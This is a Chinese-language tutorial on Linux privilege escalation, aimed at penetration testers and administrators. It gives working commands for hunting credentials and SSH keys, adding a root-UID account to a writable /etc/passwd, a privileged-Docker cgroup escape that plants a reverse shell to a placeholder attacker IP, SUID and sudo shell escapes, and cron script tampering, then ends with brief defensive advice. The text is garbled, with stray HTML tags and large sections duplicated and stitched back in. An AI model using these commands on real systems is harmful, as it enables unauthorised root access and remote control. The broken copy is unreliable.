Linux提权技术深度解析<\/h1>

前言<\/h2>
Linux提权(Privilege Escalation)是渗透测试与内网攻防中的关键环节。本文将从实际出发，系统介绍Linux中常见的提权方式，涵盖信息收集、文件权限分析、内核漏洞利用、配置错误利用等多个方面，帮助读者建立完整的提权知识体系。<\/p>

Linux权限基础<\/h2>

用户和组<\/h3>

Linux用户分为三类：<\/p>

自定义用户<\/strong>：UID在500(Centos7为1000)以上，供用户登录使用<\/li> <\/ol>
关键文件<\/h3>
\/etc\/passwd<\/h4>
格式：用户名:密码:用户ID:组ID:用户说明:家目录:登陆shell<\/code><\/p>
\/etc\/shadow<\/h4> 存储用户加密密码及相关安全信息，格式：用户名:加密密码:密码最后一次修改日期:两次密码修改时间间隔:密码有效期:密码修改到期警告天数:密码过期宽限天数:账号失效时间:保留<\/code><\/p> 密码加密格式：$id$salt$encrypted<\/code><\/p> id表示算法(1=MD5,5=SHA-256,6=SHA-512)<\/li> salt为盐值<\/li> encrypted为密码hash值<\/li> <\/ul> 文件权限<\/h3> Linux使用rwx<\/code>(读、写、执行)控制文件权限：<\/p> r<\/code>：读取<\/li> w<\/code>：写入<\/li> x<\/code>：执行(对目录表示可进入)<\/li> <\/ul> 查看权限命令：ls -l<\/code>或ls -la<\/code><\/p> 权限示例：-rw-r--r-- 1 root root<\/code><\/p> 第一个字符：文件类型(-<\/code>普通文件，d<\/code>目录，l<\/code>软链接等)<\/li> 接下来三组：所有者、组、其他用户权限<\/li> 数字：硬链接数或子目录数<\/li> 两个root：所有者和所属组<\/li> <\/ul> 特殊权限<\/h3> SUID(Set User ID)<\/strong>：执行时临时赋予文件所有者权限<\/li> SGID(Set Group ID)<\/strong>：执行时临时赋予文件所属组权限<\/li> SBIT(Sticky Bit)<\/strong>：目录中只有所有者和管理员可删除\/修改文件<\/li> <\/ol> 信息收集<\/h2> 自动化工具<\/h3> 推荐工具：<\/p> linux-soft-exploit-suggester<\/a><\/li> linux-exploit-suggester-2<\/a><\/li> Linux_Exploit_Suggester<\/a><\/li> linux-exploit-suggester<\/a><\/li> <\/ol> 手动收集<\/h3> 关键命令：<\/p> 查看系统信息：uname -a<\/code><\/li> 查看用户和群组：cat \/etc\/passwd<\/code>, cat \/etc\/group<\/code><\/li> 查找明文密码：grep -r "password" \/<\/code><\/li> 查找SSH私钥：find \/ -name "id_rsa" 2>\/dev\/null<\/code><\/li> <\/ul> 提权方法详解<\/h2> 1. 内核提权<\/h3> 原理<\/strong>：利用Linux内核漏洞获取root权限<\/p> 步骤<\/strong>：<\/p> 收集内核版本信息：uname -a<\/code><\/li> 查找对应漏洞及EXP<\/li> 执行EXP实现提权<\/li> <\/ol> 工具使用<\/strong>：<\/p> .\/linux-exploit-suggester.sh <\/span><\/span><\/code><\/pre>结果分类：<\/p> Highly probable：高概率可直接利用<\/li> Probable：可能需要修改EXP<\/li> Less probable：需手动验证<\/li> Unprobable：低概率受影响<\/li> <\/ul> 2. \/etc\/passwd提权<\/h3> 前提<\/strong>：\/etc\/passwd文件可写<\/p> 步骤<\/strong>：<\/p> 生成加密密码：<\/p> openssl passwd -1 -salt hacker 123456<\/span> <\/span><\/span><\/code><\/pre>或使用Python：<\/p> python -<\/span>c 'import crypt; print(crypt.crypt("123456", "$6$salt"))'<\/span> <\/span><\/span><\/code><\/pre><\/li> 构造账号条目并追加：<\/p> echo "hacker:\$1\$hacker\$rlg3URzW8UubvJQmH0J4X.:0:0::\/root:\/bin\/bash"<\/span> >> \/etc\/passwd <\/span><\/span><\/code><\/pre><\/li> 切换用户：<\/p> su hacker <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. Docker提权<\/h3> 特权容器提权<\/h4> 检测<\/strong>：<\/p> docker inspect --format=<\/span>'{{.HostConfig.Privileged}}'<\/span> <container_id> <\/span><\/span><\/code><\/pre>利用<\/strong>：<\/p> # 在容器内执行<\/span> <\/span><\/span>mkdir \/tmp\/cgrp &&<\/span> mount -t cgroup -o rdma cgroup \/tmp\/cgrp &&<\/span> mkdir \/tmp\/cgrp\/x <\/span><\/span>echo 1<\/span> > \/tmp\/cgrp\/x\/notify_on_release <\/span><\/span>host_path=<\/span>`<\/span>sed -n 's\/.*\perdir=$[^,]*$.*\/\1\/p'<\/span> \/etc\/mtab`<\/span> <\/span><\/span>echo "<\/span>$host_path\/cmd"<\/span> > \/tmp\/cgrp\/release_agent <\/span><\/span>echo '#!\/bin\/sh'<\/span> > \/cmd <\/span><\/span>echo "sh -i >& \/dev\/tcp\/<attacker_ip>\/<port> 0>&1"<\/span> >> \/cmd <\/span><\/span>chmod a+x \/cmd <\/span><\/span>sh -c "echo \$\$ > \/tmp\/cgrp\/x\/cgroup.procs"<\/span> <\/span><\/span><\/code><\/pre>挂载宿主机目录提权<\/h4> 检测<\/strong>：<\/p> docker inspect --format=<\/span>'{{.Mounts}}'<\/span> <container_id> <\/span><\/span><\/code><\/pre>利用<\/strong>：如果挂载了\/etc目录，可参考\/etc\/passwd提权方法<\/p> 4. SUID提权<\/h3> 查找SUID文件<\/strong>：<\/p> find \/ -perm -4000 -type f 2>\/dev\/null <\/span><\/span><\/code><\/pre>高危SUID程序及利用方法<\/strong>：<\/p> 程序路径<\/th> 提权命令<\/th> <\/tr> <\/thead> \/usr\/bin\/find<\/td> find . -exec \/bin\/sh \;<\/code><\/td> <\/tr> \/usr\/bin\/vim<\/td> vim -c ':!sh'<\/code><\/td> <\/tr> \/usr\/bin\/python<\/td> python -c 'import os; os.system("\/bin\/sh")'<\/code><\/td> <\/tr> \/usr\/bin\/perl<\/td> perl -e 'exec "\/bin\/sh";'<\/code><\/td> <\/tr> \/usr\/bin\/env<\/td> env \/bin\/sh<\/code><\/td> <\/tr> \/usr\/bin\/bash<\/td> bash -p<\/code><\/td> <\/tr> <\/tbody> <\/table> 自动化工具<\/strong>： AutoSUID<\/a>可自动检测可利用的SUID程序<\/p> 5. Sudo提权<\/h3> 检测sudo权限<\/strong>：<\/p> sudo -l <\/span><\/span><\/code><\/pre>常见提权命令<\/strong>：<\/p> 通过Python：<\/li> <\/ol> sudo python -c 'import os; os.system("\/bin\/sh")'<\/span> <\/span><\/span><\/code><\/pre> 通过find：<\/li> <\/ol> sudo find \/ -exec \/bin\/sh \;<\/span> -quit <\/span><\/span><\/code><\/pre> 通过vim：<\/li> <\/ol> sudo vim -c ':!sh'<\/span> <\/span><\/span><\/code><\/pre> 通过perl：<\/li> <\/ol> sudo perl -e 'exec "\/bin\/sh";'<\/span> <\/span><\/span><\/code><\/pre>6. 定时任务提权<\/h3> 检测定时任务<\/strong>：<\/p> cat \/etc\/crontab <\/span><\/span>ls -la \/etc\/cron* <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> 查找可写的定时任务脚本<\/li> 修改脚本内容添加恶意代码<\/li> 等待任务执行获取root权限<\/li> <\/ol> 示例<\/strong>：<\/p> echo 'chmod +s \/bin\/bash'<\/span> >> \/path\/to\/vulnerable\/script.sh <\/span><\/span><\/code><\/pre>防御建议<\/h2> 定期更新系统和内核<\/li> 严格控制文件权限，特别是\/etc\/passwd、\/etc\/shadow等关键文件<\/li> 谨慎使用SUID\/SGID权限<\/li> 合理配置sudo权限，避免NOPASSWD滥用<\/li> 安全配置Docker容器，避免特权模式和敏感目录挂载<\/li> 监控定时任务和系统日志<\/li> <\/ol> 总结<\/h2> Linux提权技术多种多样，关键在于：<\/p> 全面的信息收集<\/li> 准确的风险点识别<\/li> 选择合适的利用方法<\/li> 谨慎执行避免系统崩溃<\/li> <\/ol> 掌握这些技术不仅有助于渗透测试，更能帮助系统管理员发现和修复安全隐患。<\/p>

程序路径<\/th>	提权命令<\/th> <\/tr> <\/thead>
\/usr\/bin\/find<\/td>	`find . -exec \/bin\/sh \;<\/code><\/td> <\/tr>`
\/usr\/bin\/vim<\/td>	`vim -c ':!sh'<\/code><\/td> <\/tr>`
\/usr\/bin\/python<\/td>	`python -c 'import os; os.system("\/bin\/sh")'<\/code><\/td> <\/tr>`
\/usr\/bin\/perl<\/td>	`perl -e 'exec "\/bin\/sh";'<\/code><\/td> <\/tr>`
\/usr\/bin\/env<\/td>	`env \/bin\/sh<\/code><\/td> <\/tr>`
\/usr\/bin\/bash<\/td>	bash -p<\/code><\/td> <\/tr> <\/tbody> <\/table> 自动化工具<\/strong>： AutoSUID<\/a>可自动检测可利用的SUID程序<\/p> 5. Sudo提权<\/h3> 检测sudo权限<\/strong>：<\/p> sudo -l <\/span><\/span><\/code><\/pre>常见提权命令<\/strong>：<\/p> 通过Python：<\/li> <\/ol> sudo python -c 'import os; os.system("\/bin\/sh")'<\/span> <\/span><\/span><\/code><\/pre> 通过find：<\/li> <\/ol> sudo find \/ -exec \/bin\/sh \;<\/span> -quit <\/span><\/span><\/code><\/pre> 通过vim：<\/li> <\/ol> sudo vim -c ':!sh'<\/span> <\/span><\/span><\/code><\/pre> 通过perl：<\/li> <\/ol> sudo perl -e 'exec "\/bin\/sh";'<\/span> <\/span><\/span><\/code><\/pre>6. 定时任务提权<\/h3> 检测定时任务<\/strong>：<\/p> cat \/etc\/crontab <\/span><\/span>ls -la \/etc\/cron* <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> 查找可写的定时任务脚本<\/li> 修改脚本内容添加恶意代码<\/li> 等待任务执行获取root权限<\/li> <\/ol> 示例<\/strong>：<\/p> echo 'chmod +s \/bin\/bash'<\/span> >> \/path\/to\/vulnerable\/script.sh <\/span><\/span><\/code><\/pre>防御建议<\/h2> 定期更新系统和内核<\/li> 严格控制文件权限，特别是\/etc\/passwd、\/etc\/shadow等关键文件<\/li> 谨慎使用SUID\/SGID权限<\/li> 合理配置sudo权限，避免NOPASSWD滥用<\/li> 安全配置Docker容器，避免特权模式和敏感目录挂载<\/li> 监控定时任务和系统日志<\/li> <\/ol> 总结<\/h2> Linux提权技术多种多样，关键在于：<\/p> 全面的信息收集<\/li> 准确的风险点识别<\/li> 选择合适的利用方法<\/li> 谨慎执行避免系统崩溃<\/li> <\/ol> 掌握这些技术不仅有助于渗透测试，更能帮助系统管理员发现和修复安全隐患。<\/p>

Linux提权技术深度解析<\/h1>

Linux权限基础<\/h2>

关键文件<\/h3>

\/etc\/passwd<\/h4> 格式：用户名:密码:用户ID:组ID:用户说明:家目录:登陆shell<\/code><\/p>

信息收集<\/h2>

提权方法详解<\/h2>

3. Docker提权<\/h3>

\/etc\/passwd<\/h4>
格式：`用户名:密码:用户ID:组ID:用户说明:家目录:登陆shell<\/code><\/p>`